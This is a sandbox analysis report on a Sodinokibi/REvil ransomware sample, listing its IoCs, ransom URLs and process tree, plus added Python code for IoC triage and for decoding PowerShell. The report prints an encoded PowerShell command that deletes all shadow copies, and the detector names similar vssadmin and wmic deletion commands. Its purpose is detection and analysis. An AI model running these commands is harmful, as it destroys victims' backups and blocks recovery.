Analysis

- max time kernel: 144s
- max time network: 155s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 24-01-2022 00:51
- Static task: static1
- Behavioral task: behavioral1
  - Sample: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
  - Resource: win7-en-20211208
- Behavioral task: behavioral2
  - Sample: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
  - Resource: win10-en-20211208
General

- Target: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
- Size: 114KB
- MD5: bbde806cf2c6c3e298f5f829cc982646
- SHA1: 859ef1d0f73862575afc3d4034a610fe8c1ab9f4
- SHA256: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d
- SHA512: 6c22cc218270111e8fafb42b839185720e0a30ba93fb2195bb3b2c653648752f23e3f4ad574e28497e237f95ffe8c0c38611276dab3211d0f06ef13163cfd55b
Malware Config

- Extracted from: C:\5q4l83349-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9C258382A98B7E2A
  - http://decryptor.cc/9C258382A98B7E2A
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Process: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (PID 2552)
- File renamed C:\Users\Admin\Pictures\UseResize.crw => \??\c:\users\admin\pictures\UseResize.crw.5q4l83349
- File renamed C:\Users\Admin\Pictures\DenyAssert.raw => \??\c:\users\admin\pictures\DenyAssert.raw.5q4l83349
- File renamed C:\Users\Admin\Pictures\EditInvoke.tif => \??\c:\users\admin\pictures\EditInvoke.tif.5q4l83349
- File renamed C:\Users\Admin\Pictures\ResumePing.tif => \??\c:\users\admin\pictures\ResumePing.tif.5q4l83349
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Process: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (PID 2552)
- File opened (read-only) on every drive letter except C: (25 IoCs), in the order recorded: \??\Q: \??\Y: \??\E: \??\G: \??\I: \??\L: \??\M: \??\B: \??\K: \??\N: \??\R: \??\V: \??\W: \??\X: \??\D: \??\J: \??\O: \??\P: \??\S: \??\T: \??\A: \??\F: \??\H: \??\U: \??\Z:
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (PID 2552)
- Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w071987q.bmp"
Drops file in Program Files directory (31 IoCs)
Process: dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (PID 2552)
- File created \??\c:\program files\5q4l83349-readme.txt
- File created \??\c:\program files (x86)\5q4l83349-readme.txt
- File opened for modification, all under \??\c:\program files\ (29 files): WriteRead.m4v, ConfirmRegister.mpeg3, RepairImport.css, SubmitMount.bmp, StartDismount.mpe, CompleteSubmit.wps, MountSync.M2TS, NewFormat.dotx, UnregisterInitialize.contact, UpdateUninstall.rtf, MountMove.shtml, NewCompare.doc, ReadStart.ods, StopPing.rar, UseSync.DVR-MS, ConvertCopy.inf, ConvertToUnlock.ogg, MeasureStart.potx, UnregisterRestart.asf, ApproveDebug.001, ConvertToSplit.vsw, JoinSplit.mp4v, OutInstall.wma, ProtectRead.jpg, SelectClose.ps1xml, CloseDisable.m1v, ImportPop.dib, InstallRevoke.rle, DebugResolve.ram
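The four file-system signatures above together describe the working shape of this family: every drive letter is probed for volumes, user files are renamed to <name>.<ext> with a victim-specific suffix, and a note named <ext>-readme.txt is dropped into each directory (here the suffix is .5q4l83349 and the note is 5q4l83349-readme.txt). The Python below is an added triage example, not part of this report or the sandbox's tooling, that recovers that shape from IoC lines in the format shown above: it derives the appended extension from the rename pairs, counts the drive letters swept, and confirms that the created ransom notes follow the <ext>-readme.txt naming. The sample lines are copied from this report with the process column dropped; the line format, the NT device prefix handling and the thresholds are assumptions.

```python
"""Triage helpers for the file-system IoCs a sandbox report lists for a ransomware run.

Added example for this report; it is not the sandbox's code or the sample's.
The line format ("File renamed A => B", "File opened (read-only) \\??\\X:",
"File created PATH") is assumed from how the IoCs are rendered in the report.
"""
import re
from collections import Counter

# Constructed from the IoC lines in this report (a subset, process column dropped).
SAMPLE_IOCS = [
    r"File renamed C:\Users\Admin\Pictures\UseResize.crw => \??\c:\users\admin\pictures\UseResize.crw.5q4l83349",
    r"File renamed C:\Users\Admin\Pictures\DenyAssert.raw => \??\c:\users\admin\pictures\DenyAssert.raw.5q4l83349",
    r"File renamed C:\Users\Admin\Pictures\EditInvoke.tif => \??\c:\users\admin\pictures\EditInvoke.tif.5q4l83349",
    r"File opened (read-only) \??\Q:",
    r"File opened (read-only) \??\E:",
    r"File opened (read-only) \??\A:",
    r"File opened (read-only) \??\Z:",
    r"File created \??\c:\program files\5q4l83349-readme.txt",
    r"File created \??\c:\program files (x86)\5q4l83349-readme.txt",
    r"File opened for modification \??\c:\program files\WriteRead.m4v",
]

RENAME_RE = re.compile(r"^File renamed (?P<src>.+?) => (?P<dst>.+)$")
DRIVE_RE = re.compile(r"^File opened \(read-only\) \\\?\?\\(?P<letter>[A-Za-z]):$")
CREATED_RE = re.compile(r"^File created (?P<path>.+)$")
NT_PREFIX = "\\??\\"  # the report shows targets as NT device paths (\??\c:\...)


def _normalize(path):
    """Strip the NT device prefix and lower-case, so C:\\X and \\??\\c:\\x compare equal."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return path.lower()


def appended_extensions(lines):
    """Count the suffix appended by each rename of the form src -> src.<ext>.

    Renames that change the name in any other way are ignored, so the dominant
    key is the victim-specific extension the ransomware appended.
    """
    counts = Counter()
    for line in lines:
        m = RENAME_RE.match(line)
        if not m:
            continue
        src, dst = _normalize(m["src"]), _normalize(m["dst"])
        if dst.startswith(src + ".") and len(dst) > len(src) + 1:
            counts[dst[len(src) + 1:]] += 1
    return counts


def enumerated_drives(lines):
    """Drive letters opened read-only; a sweep of most of the alphabet is the volume hunt."""
    letters = set()
    for line in lines:
        m = DRIVE_RE.match(line)
        if m:
            letters.add(m["letter"].upper())
    return sorted(letters)


def ransom_notes(lines, ext):
    """Created files named <ext>-readme.txt, the note naming this report shows."""
    wanted = f"\\{ext.lower()}-readme.txt"
    return [m["path"] for m in map(CREATED_RE.match, lines)
            if m and _normalize(m["path"]).endswith(wanted)]


def triage(lines, min_renames=3, min_drives=3):
    """Combine the three signals into one verdict for the process that produced `lines`."""
    exts = appended_extensions(lines)
    verdict = {"extension": None, "renames": 0, "drives": enumerated_drives(lines), "ransom_notes": []}
    if exts:
        ext, n = exts.most_common(1)[0]
        verdict.update(extension=ext, renames=n, ransom_notes=ransom_notes(lines, ext))
    # Mass rename to one suffix plus a drive sweep is the ransomware shape; a matching
    # note corroborates but is not required (the note name is family-specific). Thresholds assumed.
    verdict["suspicious"] = verdict["renames"] >= min_renames and len(verdict["drives"]) >= min_drives
    return verdict


if __name__ == "__main__":
    print(triage(SAMPLE_IOCS))
```

Run against the full 4 + 25 + 31 IoCs from this report, the verdict would carry extension 5q4l83349, 25 drives and both notes; the subset embedded above is enough to exercise every branch.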
Suspicious behavior: EnumeratesProcesses (5 IoCs)
- PID 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (2 events)
- PID 1488 powershell.exe (3 events)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
- Token: SeDebugPrivilege, PID 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
- Token: SeDebugPrivilege, PID 1488 powershell.exe
- Token: SeBackupPrivilege, PID 3972 vssvc.exe
- Token: SeRestorePrivilege, PID 3972 vssvc.exe
- Token: SeAuditPrivilege, PID 3972 vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe
Suspicious use of WriteProcessMemory (2 IoCs)
- PID 2552 dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe wrote to memory of PID 1488 powershell.exe (2 events)
Processes

- C:\Users\Admin\AppData\Local\Temp\dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe (PID 2552)
  Command line: "C:\Users\Admin\AppData\Local\Temp\dfb28d7daa789a01c37da5adeb165266d1b95c56698578f596f8402289c50a6d.exe"
  - Modifies extensions of user files
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1488)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\wbem\unsecapp.exe (PID 2984)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding

- C:\Windows\system32\vssvc.exe (PID 3972)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
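The only child the sample spawns is powershell.exe with an -e (EncodedCommand) argument. That argument is Base64 over the UTF-16LE bytes of the script, and decoding the blob recorded above yields `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which deletes every Volume Shadow Copy through WMI so the victim cannot roll files back (MITRE ATT&CK T1490, Inhibit System Recovery). The rest of the tree fits that action: unsecapp.exe -Embedding is the WMI client callback sink host, and vssvc.exe (PID 3972) appears holding SeBackupPrivilege and SeRestorePrivilege while the deletion runs. The Python below is an added example, not code from this report or the sandbox: it decodes -EncodedCommand payloads from a command line and flags shadow copy deletion. It generalizes beyond this sample to the vssadmin and wmic forms of the same action; the pattern list and the switch-prefix handling are assumptions.

```python
"""Decode PowerShell -EncodedCommand payloads and flag shadow-copy deletion.

Added example for this report; not code from the sandbox or the sample.
The encoded blob below is the one in this report's process tree (PID 1488).
"""
import base64
import re

# Copied from this report's process tree (powershell.exe, PID 1488).
ENCODED_FROM_REPORT = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA"
    "IAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)
REPORT_CMDLINE = "powershell -e " + ENCODED_FROM_REPORT

# Shadow-copy deletion as commonly seen: the WMI class used here plus the
# vssadmin and wmic forms. Assumed list; extend to taste.
SHADOW_COPY_PATTERNS = {
    "wmi_win32_shadowcopy": re.compile(r"Win32_Shadowcopy", re.I),
    "vssadmin_delete_shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic_shadowcopy_delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
}


def decode_encoded_command(blob):
    """-EncodedCommand takes Base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def extract_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    so compare by prefix rather than a fixed spelling. Whitespace splitting is
    enough here because a Base64 blob never contains spaces.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in ("-", "/"):
            continue
        flag = tok[1:].lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                return decode_encoded_command(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but payload is not valid Base64/UTF-16LE
    return None


def shadow_copy_deletion(script):
    """Names of the deletion patterns the (decoded) script matches."""
    return [name for name, pat in SHADOW_COPY_PATTERNS.items() if pat.search(script)]


def analyze(cmdline):
    """Decode if encoded, then classify; the raw command line is scanned when nothing is encoded."""
    decoded = extract_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits = shadow_copy_deletion(script)
    return {"decoded": decoded, "script": script, "hits": hits, "shadow_copy_deletion": bool(hits)}


if __name__ == "__main__":
    result = analyze(REPORT_CMDLINE)
    print(result["script"])
    print("shadow copy deletion:", result["shadow_copy_deletion"], result["hits"])
```

Because the WMI route never invokes vssadmin.exe, a detection keyed only on that binary misses this sample; decoding the encoded command, or watching for Win32_ShadowCopy access together with vssvc.exe acquiring backup/restore privileges, catches it.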
Network
MITRE ATT&CK Enterprise v6
Downloads

Memory dumps, all from PID 1488 (powershell.exe):
- memory/1488-122-0x00000222AFC90000-0x00000222AFCB2000-memory.dmp (136KB)
- memory/1488-125-0x00000222ADDE0000-0x00000222ADEF0000-memory.dmp (1.1MB)
- memory/1488-126-0x00000222ADDE0000-0x00000222ADEF0000-memory.dmp (1.1MB)
- memory/1488-127-0x00000222C7E80000-0x00000222C7EF6000-memory.dmp (472KB)